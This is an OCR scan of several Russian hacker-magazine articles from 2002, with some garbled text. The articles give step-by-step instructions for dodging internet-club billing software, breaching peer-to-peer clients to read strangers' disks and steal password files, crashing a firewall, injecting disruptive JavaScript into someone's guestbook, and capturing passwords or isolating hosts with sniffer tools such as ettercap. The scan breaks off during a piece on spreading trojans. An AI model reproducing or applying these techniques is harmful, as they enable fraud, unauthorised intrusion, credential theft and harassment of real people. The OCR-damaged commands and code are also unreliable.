МЕ (ато и 95). Причин этому несколько: под не- 
го гарантированно идут все игры, скорость вы- 
ше, чем в 2000/ХР, меньше гимора при переуста- 
новках (которые в клубах бывают очень часто), 
да и стоит он дешевле (в любые фирмы перио- 
дически наведываются ревизоры, которые сле- 
дят за тем, чтобы там не ставили пиратских осей 
- за это фирму могут оштрафовать и закрыть). 
Но беда в том, что в Окошках семейства 9х ком- 
пьютер остается беззащитным как младенец в 
лесу. 

Любой софт для удаленного администрирова- 
ния, как известно, состоит из клиентской и сер- 
верной частей. На админской машине стоит 
клиент, а на пользовательских - серверы. Сер- 
верная часть грузится автоматически при за- 
грузке Windows и тут же сверяется с клиентом 
на админском компе о состоянии текущего 
пользовательского компа - не заблокирован ли 
он, если нет, сколько осталось еще оплаченного 
времени ит.д. 


НАТЯГИВАЕМ АДМИНА 


Вся твоя задача сводится к тому, чтобы переза- 
грузить комп в то время, когда у тебя еще есть 
оплаченное время, и выгрузить эту серверную 
часть еще на стадии загрузки, так как когда ма- 
шина будет полностью загруженной, выгрузить 
ее уже не удастся. Алгоритм действий следую- 
щий. Как только компьютер загружен до того 
момента, когда на экране появился только кур- 
cop Windows и, возможно, заставка, но еще не 
появились иконки и кнопка «Пуск», именно в 
этот момент нажимаем ctrl+alt+del. В появив- 
шемся списке задач, скорее всего, ты уже уви- 
дишь серверную часть, и возможно, кроме нее 
ничего больше не будет вообще (explorer еще не 
успел стартануть). Называться она может по- 
разному, тут уже придется угадывать методом 
исключения: то есть ты примерно должен по- 
мнить, какие компоненты Windows грузятся в 
обязательном порядке, и если в списке уже ус- 
пело появиться несколько процессов, выгружай 
тот, который, скорее всего, не относится к стан- 
дартным компонентам Windows. Выделяй его и 
снимай задачу. Не забывай, что таких задач 
(серверных частей) может быть несколько, и 
всех их придется выгрузить при загрузке, мало 
ли что там админы намудрили. Далее дай компу 
загрузиться до конца. Если все получилось (мо- 
жет не сразу получиться), то ты увидишь полно- 
стью рабочий комп без всяких сообщений о 
блокировке со всеми доступными программами. 
Иногда доступны даже панель управления и 
прочие системные настройки. И главное, этот 
комп уже нельзя будет никаким образом адми- 
нить с админского компа и тем более заблоки- 
ровать его оттуда. Это можно делать как в слу- 
чае, если ты просто решил продлить себе время, 
так и с совсем заблокированной машиной, но в 
последнем случае к тебе может подойти злой 
админ и надавать по наглой репе. По-любому на 


админской тачке твой комп так и будет отмечен 
как активный и оплаченный, пока админ не за- 
метит, что больно уж долго он остается не бло- 
кированным, хотя оплатили его всего на час. Ес- 
ли же ты просто по-наглежке завалился в клуб 
без копья в кармане и разблокировал неопла- 
ченный комп, то на админском компе эта тачка 
так и будет выглядеть заблокированной. 

Еще одна фишка - это старый добрый msconfig. 
Для тех, кто в танке, - это такая команда, позво- 
ляющая изменять системные настройки. Но для 
этого у тебя должен быть доступ к пункту «Вы- 
полнить» (Кип) или к режиму командной стро- 
ки. Такие вещи обычно скрываются админами, 
но вполне можно попробовать создать Ба*-файл 
с путем к этому файлу. Либо на время отредак- 
тировать какой-нибудь ярлык, прописав ему 
этот путь. Файл msconfig.exe находится в ката- 
логе windows\system. В Win2000 и ХР это файл 
находится в windows\pchealth\helpctr\binaries. 
Там можно найти и отменить некоторые процес- 
сы, которые грузятся вместе с Windows. Попро- 
буй найти и убрать какую-нибудь запись там о 
серверной части. И тогда машину вообще нель- 
зя будет админить :). Также не забывай про та- 
кую вещь, как защитный режим. В нем вообще 
могут оказаться доступны любые настройки. 
Теперь коротко о Win2000 и ХР. Если вдруг ты 
столкнулся в клубе с этими осями (что малове- 
роятно, но возможно), то там сделать все это на- 
много трудней. Так как в этих осях, как извест- 
но, если админ что-то запретил, то это можно 
менять, только если знать пароль на полный до- 
ступ. Хотя, если ходить в клуб часто, пароль 
можно подсмотреть - наверняка там для всех 
KOMNOB один И TOT Же пароль администратора и, 
скорее всего, не сложный. Но все же выгрузить 
серверную часть тоже можно попробовать, а 
может быть, получить доступ к msconfig. К тво- 
ему сведению, админы иногда вообще оставля- 
ют пароль введенным, чтобы не вводить каждый 
раз. Особенно это касается расшаренных дис- 
ков, а это дает тебе возможность покопаться на 
чужих тачках, а то и на админском компе. Ду- 
маю, ты понял, чем это чревато для админа. 
Некоторые клубы выкладывают на своих сайтах 
собственные проги администрирования (осо- 
бенно если они сами являются авторами такого 
софта) для ознакомления другим клубам. Что 
мешает тебе тоже ее скачать и исследовать на 
предмет дыр? 


БУДЬ ЧЕЛОВЕКОМ 


Не замечать твою выходку админ может в тече- 
ние довольно длительного времени, и ты вполне 
спокойно сможешь поиграть. Главное - не на- 
глей и не хами админу (на этот случай в клубе и 
охранник имеется), если тот тебя профиксил. 
Лучше закоси под ламера и постарайся отма- 
заться, что ты ни при чем или что ты больше так 
не будешь (рекомендую носить с собой немного 
денег, на всякий случай). Вообще-то, админы 
тоже не дураки и, как правило, знают о возмож- 
ности таких вот приколов. Кроме того, началь- 
ство их здорово дрючит и вычитает из зарплаты 
за все такие недоработки, если заметят, что 
компы использовались больше, чем за это полу- 
чено денег. Так что чисто человеческий тебе со- 
вет - пожалей админов, у них и так очень не- 
большая зарплата, а работа при этом достаточно 
нелегкая. Поставь себя на их место, хотя бы на 
время :). А потом отжуль-таки полчасика. По- 
любому :). 
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В ПРОДАЖЕ С 19 НОЯБРЯ 
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пора бояться 


Хрым7 (hrimz@xyligan.ru) 


Привет! Наверное, сразу после покупки «Спеца» ты пришел 
домой, и первое, что делаешь, - к компу любимому бежишь. 
Угадал? И, конечно же, проверяешь, сколько новых *.mpeg'oB 
и *.mp3'wek залилось на твой винт с помощью любимого peer 
to peer клиента. О-го! Целых 18 треков, ну, за такое не 
жалко и свою коллекцию расшарить, тем самым поделившись 
с половиной мира музыкой/фильмами, а заодно и нет- 
ни ICQ-uin, иркиными логами и еще тучей приватной 
инфы :). 


Думаешь, гоню? Нет, приятель, во всем хорошем и удобном всегда есть за- 
падло. Вот и в мега-популярных нынче MyNapster ax и остальных 
Grokster” ах дырок по самое не балуйся. Стоит только взглянуть на постин- 
ги в известных bugtraq ах, и челюсть придется поднимать с пола. Да, при- 
мерно пять лимонов онлайн-пользователей даже не подозревают, что по- 
иметь самое приватное содержимое их винтов - дело 15 минут. 

Разработчики только пожимают плечами и даже не соизволили открыть на 
официальном сайте самый популярный раздел - «Bugs reports» :). Един- 
ственное, что предприняли девелоперы для защиты туевой хучи юзеров, так 
это создали прогу BullGuard, которая валяется на download.com. 
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BullShit, ой, простите, BullGuard :) 


Она является фаерволлом для peer2peer клиентов и контролирует весь 
процесс серфа по чужому винту. Вроде бы с ней трудно совладать, и если 
ты попробуешь залезть в папку винды у удаленного ламера, то БулГард 
начнет страшно ругаться на злобных хакеров, ну и далее по сценарию. 
НО! Но. Даже вот такую специальную софтину, писанную крутыми про- 
граммистами, можно повалить в даун так же легко, как два байта пере- 
слать... Просто посылаем запрос на вражескую тачку во встроенном в 
клиент браузере такого вида: ip.ad.re.ss:1214/aaaaaaaa(u так далее)/. 
После такого запросика фаерволл подумает-подумает, да и плюнет на ха- 
кера, а и то и вообще аварийно завершится. Так что BullGuard - практиче- 
ски то же самое, что и BullShit :-). 


SAVE THE NAPSTER И ВСЕ ТАКОЕ... 


Когда-то давно на MTV показывали такой рекламный ролик, в котором у 
чувака, юзающего напстер и безвозмездно слушающего попсовые бур- 
жуйные мотивы, служители закона вынесли из дома комп, мебель и телку 
заодно. Предварительно наклеив ей на задницу баннер Napster’ a. Те 
стремные времена уже давно прошли :). Теперь Напстер мертв, но есть 
множество аналогичных ему сетей, в которых можно обмениваться лю- 
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Здесь тоже тишина 


бым электронным Stuff om бесплатно. Яркими примерами таких сетей мо- 
гут служить MyNapster, KaZaA, Grokster, Morpheus и так далее. В качестве 
примера для статьи я подробно рассмотрю KaZaA и MyNapster. Но ты мо- 
жешь не париться, так как большинство багов одних клиентов спокойно 
реализуется в других. В общем, экспериментируй. 


ПОДГОТОВКА 


Для начала тебе неплохо бы обзавестись одной из копий peer2peer про- 
граммы. После установки регистрируйся в сети и радостно жди списка ак- 
тивных (онлайн) пользователей длиной в километр. Собственно, для под- 
готовки нам большего и не надо :). Еще очень желательно все деструктив- 


Регистрироваться лучше с левым ником 


ные действия проводить через анонимную проксю. Не простую аноним- 
ную проксю, а поддерживающую Sock5. Для примера опишу действия в 
Козе (ака Kazaa). Лезешь в меню Tools, далее жмешь Options, затем выби- 
раешь закладку Firewall. Там ставь галочку Use SOCKS5 Proxy server. Все, 
можешь вводить данные прокси-сервака. Этого для твоей защиты, я ду- 
маю, хватить, так, даже если юзер тебя запалит, то, обнаружив, что до тво- 
его 1р-шника так просто не добраться, забросит это дело. Есть, конечно, 
ушлепки, которые могут написать админу прокси-сервера и обратиться в 
разные сомнительные службы, вот тогда уже готовься вафли сушить. Но 
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Настраиваем проксю 


процент, что все зайдет так далеко, - минимален. Не забывай, я тебя пре- 
дупреждал :). 


ИНСТРУМЕНТЫ 


Теперь рассмотрим, что нам может понадобиться. Те!пе{-клиент, сканер 
портов и, возможно, по твоему усмотрению, другой хацкерский софт. 


ЗАЖИГАЙ! ЧАСТЬ ПЕРВАЯ 


Для начала посмотрим, что можно сделать с нерадивым юзером самым про- 
стым методом. Запускаем любой сканер портов, главное, чтобы он умел ска- 
нировать диапазон адресов на определенный открытый порт. Устанавлива- 
ем диапазон ip шников покрупнее, а в качестве порта указываем стандарт- 
ный реег2реег`овский 1214. Запомни это число - в нем хакерская сила :). 
Скорее всего, уже через минуту у тебя появится с десяток адресов активных 
электронных менял. Далее телнетимся к каждой из жертв на пресловутый 
1214 и смотрим, какой клиент она юзает. Допустим, это Коза. Тогда запус- 
каем свою Козу, ждем состояния Connect, а далее в строке встроенного бру- 
зера вбиваем 111.111.111.111:1214, где 111 заменяем реальным адресом 
жертвы. С большой долей вероятности у тебя через мгновение отобразится 
содержимое винта юзера, а тут дело за малым. Врубаем поиск по маске 
* pwl, и пассворды у нас в руках. Да, вот так все просто, я же говорю - рог 
варезобилия :). А главное, это реально подходит под тематику легкого ха- 
ка. Сканером, я думаю, любой пользоваться умеет? 


PEER2PEER 


Вот ona, Козочка :-) 


ЗАЖИГАЙ! ЧАСТЬ ВТОРАЯ 
Теперь посмотрим, что еще можно сотворить с беззащитной системкой. Ну, 
например, такое. Правда, этот пример посложнее. Во многих реег2реег кли- 
ентах есть такая шняга, как передача сообщений между онлайн-юзерами. А 
в некоторых, в МуМарз{ег`е, например, даже есть встроенный irc. С Мис` ом 
конечно не сравнится, но для сельской местности сойдет. Ну да не об этом 
речь. Известный баг, от которого практически нет защиты. Суть его в том, 
что если подделать заголовок пакетов, в которых идет сообщение, то про- 
грамма даст доступ ко всему вражескому винту. Для этого нужно заменить 
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Сканируем, по старинке, ip-tools amu 


свой ip на 127.0.0.1, а свой логин в системе на логин жертвы (например, 
твой логин в сети Kazaa может быть вида xakep@KAZAA, а жертвы - 
lamer@KAZAA). Чтобы провернуть эту фишку, нужно воспользоваться спе- 
циальным софтом, который может создавать пакеты и в котором есть воз- 
можность полностью переписывать заголовок. Все эти программки можно 
с легкостью найти на www.securitylab.ru, в разделе «Софт». Чтобы понять 
действие этих прог - читай предыдущие номера Спецов по теме взлома. Там 
много про это было. 


ЗАКЛЮЧЕНИЕ 


В этом самом заключении хотелось бы упомянуть такую вещь. Для взлома 
машин многих пользователей вообще ничего не надо - они просто не на- 
страивают свои клиенты как следует, в результате у них «официально» 
доступен на растерзание весь винт :). Так что реег2реег - это просто кла- 
дезь всего, что только можно, и все :). Но не стоит злоупотреблять этим, 
ведь есть же все-таки юзеры, которые действительно хотят поделиться 
интересной инфой с тобой и другими, а взамен просят пару рефератов и 
три мптришки. 

Для защиты же своей тачки советую поставить хороший фаерволл. Под хо- 
рошим я подразумеваю, например, Agnitum Outpost. Встретимся в Козе :). 
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тот поступает мудро: 
гадим в гостевухах 


Андрей «Дронич» Михайлюк (droni 


ПРЕЛЮДИЯ 


Многие недоадмины очень любят использовать чужие скрипты. Особенно 
если они лежат на чужом серваке и охраняются чужой администрацией. 
Ход их рассуждений примерно таков: «ЭТИМ пользуюсь не только я, о за- 
щите ТАМ думают профессионалы, скрипт у НИХ проверен временем» и 
все такое. Короче, зарегистрировав себе гостевуху или форум на сайте, 
предоставляющем такие услуги, админ считает, что избавился ото всех 
проблем. А зря. 


Как всегда, буду рассказывать на примере. Один из моих товарищей (бу- 
дем называть его скромно - Админ :)) вел сайт своей дражайшей инсти- 
тутской группы на хостинге NewMail, не поддерживающем ни перла, ни 
РНР, ни чего-то другого. Ежику понятно, что свою гостевуху ака форум он 
зарегил на бесплатном хостинге, которым оказался guestbook.net.ru. К 
слову, нетрусовцы предлагают очень неплохой набор услуг на приемле- 
мых условиях (что-то вроде одного баннера). Так вот, наш Админ решил, 
что для указания всем на свою крутость он будет использовать HTML: 
вставлять в гестбуку фотки с попоек, линки на модные сайты, а главное: 
красиво выделять админские комментарии :). Так их сайт и жил - от по- 
пойки до попойки. Пока мне не захотелось повеселиться :). 


КАК ЭТО БЫЛО 


Для начала была проведена разведка боем: я зарегил себе гестбуку на 
том же серваке и потестил его на дырочки - не пропускает ли скрипты, не 
отсылает ли пароль на мыло и т.п. Оказалось, что на дефолтных настрой- 


ЧесетЬег/ 12/2002 


h@real.xakep.ru 


Флеймить и флудить в гостевых книгах He нравящихся тебе 
людей - это очень нехорошо. Но иногда нужно устроить 
кому-то дестрой и раздрай в качестве профилактики или 
просто из чувства собственного превосходства, A в 
концепции легкого хака «нашел, нагадил, пошел искать 
Дальше» есть много методов устройства гадостей 
р Один из них, мой любимый, - игрушки с 

HTML ем. 


рис. Анатолий Бердюгин 


ках гостевушка неприступна. Но когда я поставил галку «разрешить HTML 
в сообщениях», челюсть моя чуть не пробила крышку стола. В чем было 
дело? Люди, создавшие guestbook.net.ru, решили не заморачиваться с 
проверками на <Script> и прочие радости, а просто сделали два режима, 
переключающихся этой самой галкой - либо теги не разрешены вообще, 
либо... разрешены все :). А раз Админ использовал НТМЕ для себя, поче- 
му бы не помочь ему и поюзать всю мощь ЖамаСкрипта? В конфу было за- 
постено сообщение от некого чела, выражающего признательность Адми- 
ну лично за отличный дизайн. А в конце сообщения скромно притаился 
вызов функции следующего содержания: 

function kill() 


t=setTimeout(killer, 10) 
} 

function killer () 
document.write (« «) 


Этот скрипт замечателен тем, что наглухо вырубает ИЕ уже три года подряд 
:), но не трогает Оперу, фэном которой был наш Админ. В итоге поднялась 
страшная буча - все посетители сайта вопили на ни в чем не повинного Ад- 
мина, что, дескать, гостевуха не работает; он честно заходил на нее и не ви- 
дел ничего подозрительного :). В итоге через недельку-другую он не нашел 
ничего лучшего, как обнулить ее, удалив все сообщения. Гы :). 

Так я баловался довольно долго, выполняя всякие alert («Ошибка скрип- 
та, гостевая книга работает в отладочном режиме») и им подобные, моро- 
ча голову несчастному Админу. Но надо от- 
дать ему должное - через месяц он все-таки 
догадался прочитать ВСЕ сообщения до кон- 
ца (а со странички администрирования де- 
лать это очень неудобно - на каждое сооб- 
щение отведено окошко всего в 5-6 строк) и 
запостил грозное сообщение на тему «Кто 
меня похакает, тому глаз вон и 120 ударов в 
тыкву». Что ж, пришлось уйти, на прощанье 
хлопнув дверью при помощи генерирующе- 
го попапы скрипта (смотри в Креативе Спеца 
по дефейсу), где в каждый попап был встав- 
лен счетчик сайта Админа. В итоге его вы- 
гнали из рейтинга на накрутку, и сайт он ре- 
шил закрыть. 


НАПУТСТВИЕ 


Все провернутые мной фичи до сих пор рабо- 
тают на этом хостинге, тебе достаточно найти 
жертву - и все. А вот если админ считает се- 
бя продвинутым и использует чужой/свой 
скрипт, запускаемый прямо с сайта, придется 
попотеть. Хотя баги в нем все равно будут - я 
знаю трех человек, которые независимо друг 
от друга писали перловые гостевухи и забы- 
вали выставить проверку на скрипты в... за- 
головке сообщения. То есть тело шмоналось 
по полной, а в имени можно было смело пи- 
сать <script>...</script>. Но это уже другая 
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Найдётся всё! 


СНУФФЕРЫ 


вынюхаем все! 


ManderX (forother@fromru.com) 


Наверняка ты уже знаком с понятием сниффер, или анализа- 
тор протоколов, но я все-таки поясню, что это; за этим по- 
следует маленький обзорчик самых популярных сниффаков, а 
потом мы приступим к самому интересному - сниффингу! В 
самом конце статьи я расскажу, как защититься от сниффе- 
ров в системе. 


HOW IT WORKS? 


X-spez уже объяснял тебе, что такое сниффер (вынюхиватель), но A все- 
таки еще раз поясню, что это такое, только по-своему. Допустим, есть сет- 
ка, каждая тачка в этой сети прослушивает и обрабатывают только те па- 
кеты, которые адресованы ей, однако можно создать такое ПО (программ- 
ное обеспечение), которое переводит сетевой интерфейс машины в не- 
разборчивый режим (promiscuous mode). В этом режиме компутер (нахо- 
дящийся в сети) будет перехватывать всю передаваемую по сети инфор- 
мацию и проходящие мимо пакеты независимо от того, кому они предназ- 
начены. Вот это ПО и есть сниффер. Чтобы понять все это детально, я бы 
советовал тебе ознакомиться с исходниками сниффера под *nix, а также 
изучить все компоненты, которые они (снифферы) используют. Напри- 
мер, можно перевести сетевой интерфейс в неразборчивый режим, ис- 
пользуя флаг из if.h. Для установки «вручную» сетевого интерфейса в не- 
разборчивый режим необходимо включить флаг PROMISC: ifconfig ethO 
promisc; для отключения - promiscuous mode: ifconfig ethO -promisc (это я 
про линух =). 


WHO IS WHO 


В настоящее время существует огромное количество снифферов как под 
вынь, так и под *nix системы. Но я заострю твое внимание только на са- 
мых популярных и чем-то примечательных. Но прежде я скажу несколько 
слов о WinPcap. Для работы с сырыми сокетами (raw sockets) под Win не- 
которые сниффаки требуют библиотеку WinPcap. Слить ее можешь тут - 
http://winpcap.polito.it/install/bin/WinPcap_2_3.exe, всего 326 КВ. Эта 
библиотека является результатом переноса ИБрсар с *nix на Win32 (как и 
сниффаков, которым она нужна, - dsniff, ethereal и др., все они были пе- 
ренесены с *nix на win). WinPcap позволяет использовать расширенный 
интерфейс Berkely Packet Filters. Подробнее о WinPcap (особенно полез- 
но для кодеров) можешь прочитать в статье «Архитектура захвата пакетов 
для Windows WinPCAP: бальзам на душу хакера или панацея для програм- 
миста?», состоящей из трех частей, ищи тут - http://www.nmap.ru/read- 
ing/index.html. А теперь о снифферах. 


Лучший способ защиты 

от сниффинга - это шифрование. 
PGP, SSH и различные утилиты 
для шифрования должны стать 
твоими лучшими друзьями! 
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ИРИСКА 


Один из самых популярных снифферов под выньдоуз - Iris от еЕуе, взять, 
соответственно, можешь на Www.eeye.com. Ессесно, не бесплатный. Этот 
сниффак является революцией в области сетевого мониторинга. Помимо 
того, что он превосходно выполняет стандартные функции (сбора, фильт- 
рации и поиска пакетов, а также построения отчетов), он способен рекон- 
струировать данные. Ириска помогает детально воспроизвести сеансы 
работы пользователей с различными web-pecypcamu и даже позволяет 
имитировать отправку паролей для доступа к защищенным Web-cepBepam 
с помощью cookies. Также в этой софтине присутствует модуль декодиро- 
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Вот оно, это чудо! (Iris) 


вания (decode module), преобразующий сотни собранных двоичных сете- 
вых пакетов в привычные глазу электронные письма, меБ-страницы, сооб- 
щения ICQ и др. 

MUST HAVE или хотя бы TRY =). 06 ириске мы с тобой еще поговорим. 


ETHEREAL 


Очень известный сниффер, перенесенный с *nix, поэтому и выглядит так 
коряво. Огромным плюсом этой софтины является то, что реализация 
ethereal есть практически под все Оси, сам глянь - 
http://www.ethereal.com/download.html, а также она бесплатна. В ос- 
тальном - просто хороший сниффер =). 
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Ужас! Iris красивее 


NETSNIFFER 


Конкурентов ириске A не нашел, HO все же этот сниффер мне тоже при- 
глянулся, так как он прост, удобен и имеет приятный интерфейс, а еще он 
на русском языке. http://www.tmeter.ru/netsniffer/ - взять можешь тут, 
программка фриварная. Знает четыре протокола (маловато будет =): 
POP3, IMAP4, FTP, PAP. Позволяет одновременно собирать пароли с 4-х се- 


тевых адаптеров. 


Простота - залог скорости 


УМЕЕТ 


А че это мы про вынь, да про вынь, давайте и о *п1х-системах поговорим. 
Sniffit - сниффер, входящий в большинство дистрибьютивов линуха, по- 
этому, скорей всего, он у тебя уже есть, очень серьезное средство, и на- 
учиться им пользоваться нелегко, поэтому я маленько поясню (ведь когда 
еще я буду писать статью про снифферы =)). Разберем вот такую строку 
запуска сниффера: 


sniffit -0 -р 23 -s 127.0.0.2 -t 127.0.0.1 -L1 


Тут -d значит, что sniffit переводится в режим dump, в этом режиме прога 
выдает пакеты в байтовом формате в стандартный выходной поток. -р ис- 
пользуется для указания конкретного контролируемого порта. -5 [1р] ис- 
пользуется для указания исходного адреса, sniffit будет перехватывать 
пакеты, поступающие именно с этого адреса. -t [ip], соответственно, ис- 


СНИФФЕРЫ 


пользуется для указания целевого адреса (target - цель), т.е. sniffit будет 
перехватывать пакеты, направляющиеся по этому адресу. Ё [уровень] - 
используется для указания уровня детализации. Тем самым я указал $п1{- 
fit отслеживать 23 порт между хостами 127.0.0.1 и 127.0.0.2. С помощью 
-с [файл_конфигурации] можешь указать файл для детального сниффин- 
га =), рассмотрим такой файл конфигурации: 


select from host 172.17.0.1 
select from host 172.17.0.2 80 
select both port 23 


Теперь разберем каждое поле конкретнее (поля по вертикали). Первое 
поле может иметь значения Select или deselect, т.е. перехватывать или не 
перехватывать пакеты с хостов. Возможные значения второго поля: from, 
to, both указывают, надо ли перехватывать пакеты, исходящие OT хоста, 
направляющиеся на хост или и те, и другие. Третье поле может содержать 
следующие значения: host, port или multiple-hosts. Это поле задает один 
или несколько целевых хостов/портов. Опция multiple-hosts позволяет 
использовать стандартные символы-заместители. В четвертом поле надо 
указать номер порта или адрес хоста, можно и список нескольких хостов. 
И в пятом поле можешь указать порт на хосте. В результате этого приме- 
ра будут перехвачены все пакеты telnet и Web, посылаемые с обоих хос- 
тов. 


TCPDUMP 


Известное средство, официальный сайт - http://www.tcpdump.org/, и, 
скорей всего, он тоже присутствует в твоем дистрибьютиве линуха (не 
сайт, а сниффер). Пример запуска: 


tcpdump -1 её ПО -n -vv -w /root/dump.log 


Здесь: -1 - сетевой интерфейс, -п - числовой вывод адресов и номеров пор- 
тов, -VV - очень подробный вывод, -W - запись лога в файл. Чтобы прочитать 
перехваченный траффик из лога, используй: tcpdump -г /root/dump.log. 
http://www.opennet.ru/opennews/art.shtml?num=824&showsection=9_ - 
здесь есть ссылка на замечательную статью об использовании tcpdump и 
дальнейшем изучении лог-файлов (английская). Этот сниффер занимает 
третье место в рейтинге лучших утилит сетевой безопасности, проводимом 
Insecure.org. 


DSNIFF 


http://naughty.monkey.org/%7Edugsong/dsniff/ - официальная страни- 
ца этого «вынюхивателя», мне там понравилась обезьянка =). Сниффер пе- 
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рехватывает пароли, че тут еще добавить =). Рекомендую запускать так: 
dsniff.exe > dsniff.log, а потом уже спокойненько рассматривать лог-файл. 


ETTERCAP 


Замечательный сниффер! Xoymnara - http://ettercap.sourceforge.net/, Ha- 
конец-то приличный урл =). Сегодня все останутся довольны, он реализо- 
ван и под винду, и под UNIX, а также он часто обновляется, последняя 
версия - 0.6.7. http://www.xakep.ru/post/16610/default.htm - тут мо- 
жешь прочитать о нем и о его работе. Далее мы разберем этот сниффак 
подробнее, так как он, как и Iris, один из самых-самых, только под *nix =). 


CGI-CHA®@EPbI 


Существуют такие снифферы, которые предназначены для ловли 
REMOTE_ADDR и PATH_INFO CGI-3anpoca. Чаще всего используются для то- 
го, чтобы узнать ip какого-нибудь чела в чате. Пример - 
http://www1.hut.ru/aneksniff/ или всем известный http://www.hack- 
zone.ru/underground/sniff.html. http://www1.xakep.ru/post/11950/ 
default.asp - здесь можешь прочитать о таком же сниффере, как и преды- 
дущие, только Ha php. Сейчас на многих халявных хостингах есть под- 
держка php, так что ты без проблем сможешь его воткнуть. 


ЕНегсар в работе 


В БОЙ! 


Если с NetSniffer-om все понятно (скрин 1), то с Iris сложнее. Так что да- 
вай с самого начала. А сначала надо указать, какой девайс юзать (скрин 
2). Недолго думая, я нажал на кнопку Play aka Start (выглядит так же, как 
и на видаке), и полилось ручьем, скока инфы-то, ничего не понять... Но 
иногда все-таки проскакивают понятные данные, например, на скрине 4 
ты можешь прочитать несколько слов (я зашел на WWwW.wzor.net). Но это 
все не то, нам нужны пароли, поэтому я приконнектился с другой тачки к 
фтп, введя логин и пароль. Останавливаем сниффер и жмем на пимпу под 
названием «decode buffer packets» (она находится левее «play»). Глянь на 
скрин 5, это то, что отловила и декодировала в нормальное сообщение 
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ириска; пароли и всю инфу, которая тебя не касается, я закрасил =). Так- 
же она может вести логи, но этим уже никого не удивишь. А удивить тебя 
может много другое в этой софтине, например, то, что ириска может pa- 
ботать по расписанию, она имеет кучу фильтров, поэтому ты можешь кон- 
кретизировать свою цель. Заметь, Iris может раскидывать пакеты не толь- 
ко по заголовкам (ТР-адрес, порт и т.д.), но и по содержанию некоторого 
слова в области пакета. И еще одной особенностью чудо-ириски являет- 
ся возможность динамического наблюдения за сетью. По твоему хотению 
она может построить всевозможные графики, основываясь на инфе, по- 
ступающей на сетевуху. Так можно выявить атакующих, можно быстро 
просмотреть диаграмму самых активных компов в сети ит.д. 


А теперь ребут, и быстрее в линух или что у тебя там? Сейчас мы займемся не 
менее популярным сниффаком - Ettercap. Для начала некоторые его опции: 
-а, -S, -т - различные виды прослушивания (выше я давал линк, там и мо- 
жешь про них прочитать); 

-N - запускать сниффер без псевдографики; 

-2 - запуск в спокойном режиме; 

-d - не преобразовывать IP-agpeca в имена; 

-1 - сетевой интерфейс; 

-L - вывести список хостов в сети; 

-С - собирать все имена и пароли пользователей; 

-f - определение операционной системы удаленного хоста; 

-р - работа с плагинами; 

-L - записывать в лог, имеющий формат: год-месяц-день-соЦесед- 
pass.log 

Теперь рассмотрим некоторые виды использования этого сниффера. Сначала 
будем перехватывать все пароли в нашем сегменте сети и записывать в лог: 


СНИФФЕРЫ 


ettercap - NdzsCLi ethO 
Определяем операционную систему хоста с ТР-адресом 127.0.0.1: 
ettercap - Ndzsfi ethO 127.0.0.1 
Смотрим установленные плагины и описания к ним: 

ettercap - № -р list 

Рассмотрим один из плагинов - leech, он изолирует удаленный хост от се- 
ти. Пропинговав хост, видим, что он в сети. Запускаем плагин: 

ettercap -Ndp leech 192.168.6.89 

Your IP: 192.168.6.81 МАС: 00:50:BF:4A:48:F3 асе: е90 

Starting ./ec_leech.so plugin... 

Building host list for netmask 255.255.255.0, please wait... 

Sending 255 ARP request... 

Listening for replies... 

Isolating host 192.168.6.89... Press return to stop 
Ждем-с пару секондз и жмем “C, усе, сетевой интерфейс перестает рабо- 
тать на некоторое время, но OC и приложения продолжают работать нор- 
мально, этого «некоторого времени» хватает на заполучение 1р-адреса 
жертвы. Пингуем для проверки! 

PING 192.168.6.89 (192.168.6.89): 56 data bytes 

—-192.168.6.89 ping statistics—- 

4 packets transmitted, 0 packet received, 100% packet loss 
Для перехвата незашифрованных почтовых сообщении будем юзать: 
./ettercap -Nzds <1Р-адрес почтового cepBepa>:<port почтового серве- 
ра> <ГР-адрес клиента> 


Пример - ./ettercap -Nzds ANY:25 ANY > /root/sniff.smtp 


= 
= 
= 
= 
= 


КОНТРМЕРЫ 


Безусловно, лучший способ защиты от сниффинга - это шифрование. PGP, 
SSH и различные утилиты для шифрования должны стать твоими лучшими 
друзьями! Но есть еще способ для того, чтобы обнаружить сниффер в си- 
стеме: необходимо проверить, не работает ли какое-либо из сетевых уст- 
ройств в сети в неразборчивом режиме. Под линукс есть одно средство - 
ifconfig, эта тулза сообщает о состоянии сетевых устройств. 


Bot uv все! Фу... Еще хочу добавить одно слово! Снифферы представляют 
собой существенную угрозу безопасности в основном из-за трудности их 
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обнаружения. Изучение способов применения «вынюхивателей» и пони- 
мание того, как они могут быть использованы против тебя, существенно 
поможет тебе в защите от оных. Удачи! 


раде 037 


БТ UNMU 
НЕ BYT? 


продвинуто 


распространяем троев 


DarkSergeant ( ergeant@inbox.ru 


Для начала давай разберемся, что мы хотим сделать после того, как полу- 
чит управление наш троян, от этого будет зависеть, какие программы уже 
должны быть запущены (или работу каких программ мы должны эмулиро- 
вать сами). Так, если мы хотим запороть инфу на винте, то нам никаких 
особых программ не надо, а можно руками отформатировать винт, полу- 
чим доступ к нему на низком уровне. 

Но если мы хотим, чтобы наша программа прописалась на винт и получала 
управление при последующей загрузке с винчестера, то уже надо многое... 


ГОТОВИМ 


«Программа переписалась на винт». 

Для того чтобы совершить такое простое действие, необходим запущен- 
ный драйвер файловой системы дискеты и драйвер файловой системы 
винчестера. С дискетой все просто, мы ее сами делаем, поэтому можем ис- 
пользовать какую хотим на ней файловую систему, хоть Fat16, хоть Fat32, 
хоть какую-нибудь экзотику, на крайняк можем сделать свою простень- 
кую файловую систему со своим драйвером. С винчестером все намного 
хуже, мало того, что мы точно не знаем, какая там система используется, 
так еще и нужны драйвера для этих систем. На винчестере под управле- 
нием Windows может использоваться Fat32 или NTFS; если с Fat32 все про- 
сто, можно использовать драйвер со стандартной загрузочной дискеты 
Windows-a, то с NTFS все сложнее, необходим специальный драйвер для 
доступа к NTFS из-под DOS. Мало того, что драйверы NTFS из-под DOS 
глючные, так они еще и здоровые как не знамо кто, а дискета у нас ма- 
ленькая, все на нее не упихнешь. Поэтому придется пока надеяться на то, 
что на атакуемом компьютере используется FAT. 


«Программа получила управление при последующей 

загрузке с винчестера». 

Это можно сделать следующими способами. Заменить загрузочный сектор 
винчестера или записать вызов себя в autoexec.bat. Но эти оба способа 
не удобны, так как windows до сих пор не запущена и приходится все де- 
лать самому. (Хотя, конечно понятно, что U без загруженного виндоуса 
можно вытащить пароли и отправить их по почте, но уж очень много кода 
придется писать ручками.) Получается, что на самом деле нам надо полу- 
чить управление при запущенной винде, но сбрасывать со счетов эти спо- 
собы не надо. Можно использовать их в качестве промежуточной cTy- 
пеньки для того, чтобы отдельные шаги были меньше и быстрее и поэтому 
менее заметны пользователем. 


